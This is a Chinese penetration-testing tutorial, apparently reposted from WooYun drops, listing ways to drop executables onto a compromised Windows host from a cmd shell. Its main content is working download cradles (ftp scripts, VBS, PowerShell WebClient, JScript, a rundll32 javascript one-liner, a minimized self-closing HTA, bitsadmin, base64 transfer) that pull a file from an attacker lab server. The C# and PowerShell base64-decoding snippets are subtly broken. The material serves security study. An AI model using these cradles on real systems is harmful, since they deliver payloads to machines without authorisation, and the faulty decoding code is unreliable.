渗透技巧——通过Cmd上传文件的N种方法

本文由三好学生原创并首发于乌云drops,转载请注明

0x00 前言

在渗透测试的过程中,常常需要向目标主机上传文件,我在最近的学习测试过程中就碰到了这个问题,要求只能通过cmd shell向目标主机(Windows系统)上传文件,所以本文就对该技巧做一下总结。

0x02 测试环境

OS:Win7 x86

test exe:ssss2.exe,成功运行后输出1

0x03 通用上传方法

1、 Debug

debug是一个程序调试工具,功能包括:

直接输入,更改,跟踪,运行汇编语言源程序

观察操作系统的内容

查看ROM BIOS的内容

观察更改RAM内部的设置值

以扇区或文件的方式读写软盘数据

特别的是它还有一个功能可以将十六进制代码转换为可执行文件:

结合本文的目标,思路如下:

把需要上传的exe转换成十六进制hex的形式

通过echo命令将hex代码写入文件

使用debug功能将hex代码还原出exe文件

实际测试:

kali中的exe2bat.exe提供了这个功能,位于/usr/share/windows-binaries

如图

操作步骤:

kali:

#!bash

cd /usr/share/windows-binaries

wine exe2bat.exe ssss2.exe ssss2.txt

执行后会生成ssss2.txt,将里面的内容复制粘贴到cmd命令行下依次执行

执行后会生成1.dll、123.hex、ssss.exe

如图

注:

exe2bat不支持大于64kb的文件 debug默认只支持在32位系统

如图

2、Ftp

搭建好ftp服务器:

ip:192.168.174.151

文件:ssss2.exe

按顺序执行如下代码即可通过ftp来下载文件

cmd:

#!bash

echo open 192.168.174.151 21> ftp.txt

echo ftp>> ftp.txt

echo bin >> ftp.txt

echo ftp>> ftp.txt

echo GET ssss2.exe >> ftp.txt

ftp -s:ftp.txt

如图

注:

初次使用ftp下载防火墙会弹框拦截,使用前记得要先添加防火墙规则

3、Vbs

vbs downloader,使用msxml2.xmlhttp和adodb.stream对象

如下代码保存为.vbs文件:

#!vb

Set Post = CreateObject("Msxml2.XMLHTTP")

Set Shell = CreateObject("Wscript.Shell")

Post.Open "GET","http://192.168.174.145/ssss2.exe",0

Post.Send()

Set aGet = CreateObject("ADODB.Stream")

aGet.Mode = 3

aGet.Type = 1

aGet.Open()

aGet.Write(Post.responseBody)

aGet.SaveToFile "C:\test\update\ssss2.exe",2

对应到cmd下的命令为:

#!bash

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs

echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs

echo Post.Open "GET","http://192.168.174.145/ssss2.exe",0 >>download.vbs

echo Post.Send() >>download.vbs

echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs

echo aGet.Mode = 3 >>download.vbs

echo aGet.Type = 1 >>download.vbs

echo aGet.Open() >>download.vbs

echo aGet.Write(Post.responseBody) >>download.vbs

echo aGet.SaveToFile "C:\test\update\ssss2.exe",2 >>download.vbs

按顺序依次执行后会生成download.vbs,然后执行download.vbs即可实现下载ssss2.exe

4、Powershell

cmd:

#!powershell

powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.174.145/ssss2.exe','C:\test\update\ssss2.exe')

5、Csc

csc.exe是微软.NET Framework 中的C#编译器,Windows系统中默认包含,可在命令行下将cs文件编译成exe

c# downloader的代码为:

#!csharp

using System.Net;

namespace downloader

{

class Program

{

static void Main(string[] args)

{

WebClient client = new WebClient();

string URLAddress = @"http://192.168.174.145/ssss2.exe";

string receivePath = @"C:\test\update\";

client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName

(URLAddress));

}

}

}

使用echo将代码依次写入文件download.cs中,然后调用csc.exe编译cs文件

执行

#!bash

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:C:\tes

t\update\download.exe C:\test\update\download.cs

如图成功生成download.exe

注:

csc.exe的绝对路径要根据系统的.net版本来确定

6、JScript

相比于JSRat中用的Scripting.FileSystemObject

换用ADODB.Stream实现起来更加简单高效

以下代码依次保存为js文件,直接执行即可实现下载文件

#!js

var Object = WScript.CreateObject("MSXML2.XMLHTTP");

Object.open("GET","http://192.168.174.145/ssss2.exe",false);

Object.send();

if (Object.Status == 200)

{

var Stream = WScript.CreateObject("ADODB.Stream");

Stream.Open();

Stream.Type = 1;

Stream.Write(Object.ResponseBody);

Stream.SaveToFile("C:\\test\\update\\ssss2.exe", 2);

Stream.Close();

}

合并成rundll32的一句话(类似于JSRat的启动方式):

cmd:

#!bash

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();Object=new%20ActiveXObject("Microsoft.XMLHTTP");Object.open("GET","http://192.168.174.145/ssss2.exe",false);Object.send();if(Object.Status==200){Stream=new%20ActiveXObject("ADODB.Stream");Stream.Open();Stream.Type=1;Stream.Write(Object.ResponseBody);Stream.SaveToFile("C:\\test\\update\\ssss2.exe",2);Stream.Close();}

执行后会提示没有权限,很有趣的地方,更多的细节会在以后的文章介绍

7、Hta

添加最小化和自动退出hta程序的功能,执行过程中会最小化hta窗口,下载文件结束后自动退出hta程序

以下代码保存为.hta文件:

#!js

<html>

<head>

<script>

var Object = new ActiveXObject("MSXML2.XMLHTTP");

Object.open("GET","http://192.168.174.145/ssss2.exe",false);

Object.send();

if (Object.Status == 200)

{

var Stream = new ActiveXObject("ADODB.Stream");

Stream.Open();

Stream.Type = 1;

Stream.Write(Object.ResponseBody);

Stream.SaveToFile("C:\\test\\update\\ssss2.exe", 2);

Stream.Close();

}

window.close();

</script>

<HTA:APPLICATION ID="test"

WINDOWSTATE = "minimize">

</head>

<body>

</body>

</html>

8、Bitsadmin

bitsadmin是一个命令行工具,可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带

使用方法:

cmd下:

#!bash

bitsadmin /transfer n http://download.sysinternals.com/files/PSTools.zip C:\test\update\PSTools.zip

下载成功如图:

注:

不支持https、ftp协议

使用kali的simplehttpserver作服务器会报错

9、Base64

将exe先作base64加密,通过cmd上传后解密输出 对exe作base64加密的方法:

(1)powershell

$PEBytes = [System.IO.File]::ReadAllBytes("C:\windows\system32\calc.exe")

$Base64Payload = [System.Convert]::ToBase64String($PEBytes)

Set-Content base64.txt -Value $Base64Payload

运行后会将C:\windows\system32\calc.exe作base64加密并输出到base64.txt

(2)c#

using System;

using System.IO;

using System.Collections.Generic;

using System.Linq;

using System.Text;

using System.Threading.Tasks;


namespace test1

{

class Program

{

static void Main(string[] args)

{

byte[] AsBytes = File.ReadAllBytes(@"C:\windows\system32\calc.exe");

String AsBase64String = Convert.ToBase64String(AsBytes);

StreamWriter sw = new StreamWriter(@"C:\test\base64.txt");

sw.Write(AsBase64String);

sw.Close();

}

}

}

(3)eml附件

(思路由猪猪侠提供)

server2003 默认包含outlook客户端C:\Program Files\Outlook Express

运行后-新建邮件-上传附件-另存为eml格式

使用notepad打开eml邮件,可看到加密的base64代码

如图

解密base64文件并生成exe的方法:

(1)powershell

$Base64Bytes = Get-Content (base64.txt)

$PEBytes= [System.Convert]::FromBase64String($Base64Bytes)

Set-Content calc.exe -Value $PEBytes

(2)c#

using System;

using System.IO;

using System.Collections.Generic;

using System.Linq;

using System.Text;

using System.Threading.Tasks;


namespace test1

{

class Program

{

static void Main(string[] args)

{

byte[] AsBytes = File.ReadAllBytes(@"C:\test\base64.txt");

String AsBase64String = Convert.FromBase64String(AsBytes);

StreamWriter sw = new StreamWriter(@"C:\test\calc.exe");

sw.Write(AsBase64String);

sw.Close();

}

}

}

注: 读文件的操作可替换为base64代码直接写入脚本文件中

0x04 补充上传方法

以上均为系统默认包含的程序,结合以上方法并借助于第三方工具也能够实现功能

这里介绍的思路是可先通过bitsadmin来下载第三方工具,然后利用第三方工具进行传输文件

1、Wget:

#!bash

bitsadmin /transfer n http://www.interlog.com/~tcharron/wgetwin-1_5_3_1-binary.zip C:\test\update\wget.zip

运行后会下载wget的压缩包wget.zip

注:

Windows系统默认不包含解压缩zip文件的命令,但是可以通过vbs来实现解压缩zip文件

vbs实现解压缩:

以下代码保存为.vbs文件:

#!vb

UnZip "C:\test\update\wget.zip","C:\test\update\wget\"

Sub UnZip(ByVal myZipFile, ByVal myTargetDir)

Set fso = CreateObject("Scripting.FileSystemObject")

If NOT fso.FileExists(myZipFile) Then

Exit Sub

ElseIf fso.GetExtensionName(myZipFile) <> "zip" Then

Exit Sub

ElseIf NOT fso.FolderExists(myTargetDir) Then

fso.CreateFolder(myTargetDir)

End If

Set objShell = CreateObject("Shell.Application")

Set objSource = objShell.NameSpace(myZipFile)

Set objFolderItem = objSource.Items()

Set objTarget = objShell.NameSpace(myTargetDir)

intOptions = 256

objTarget.CopyHere objFolderItem, intOptions

End Sub

代码来自于http://demon.tw/programming/vbs-unzip-file.html

成功解压缩后就可通过wget.exe来传输文件

#!bash

C:\test\update\wget\wget.exe http://192.168.174.145/ssss2.exe

如图

2、Ftfp

思路同上,先通过bitsadmin下载tftp.exe,然后利用tftp传输文件

#!bash

bitsadmin /transfer n http://www.winagents.com/downloads/tftp.exe C:\test\update\tftp.exe

下载成功后利用tftp传输文件:

#!bash

tftp -i 192.168.174.151 GET tftp\ssss2.exe C:\test\update\ssss2.exe

注:

默认防火墙会拦截

关掉防火墙或者添加规则即可

如图

0x05 小结

本文对一些常用的通过cmd来传输文件的技巧做了整理,侧重于介绍其中较为通用简便的方法,所以并未介绍其他需要配置开发环境的实现方法,如Python、Ruby、Php等,如果你有更好的实现方法,欢迎与我交流,共同学习。

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 206,126评论 6 481
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 88,254评论 2 382
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 152,445评论 0 341
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 55,185评论 1 278
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 64,178评论 5 371
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,970评论 1 284
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,276评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,927评论 0 259
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,400评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,883评论 2 323
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,997评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,646评论 4 322
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,213评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,204评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,423评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,423评论 2 352
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,722评论 2 345

推荐阅读更多精彩内容

  • 渗透技巧--通过cmd上传文件的N种方法 1.debug debug是一个程序调试工具,功能包括:(win7以上版...
    Bugl0v3r阅读 4,708评论 0 1
  • 1.powershell下载 powershell$client=new-objectSystem.Net.Web...
    simeon2015阅读 588评论 0 3
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,599评论 18 139
  • .bat脚本基本命令语法 目录 批处理的常见命令(未列举的命令还比较多,请查阅帮助信息) 1、REM 和 :: 2...
    庆庆庆庆庆阅读 8,047评论 1 19
  • 部分内容转载自搜狗百科 cmd是command的缩写.即命令提示符(CMD),是在OS / 2 , Windows...
    青冥之上阅读 2,387评论 0 24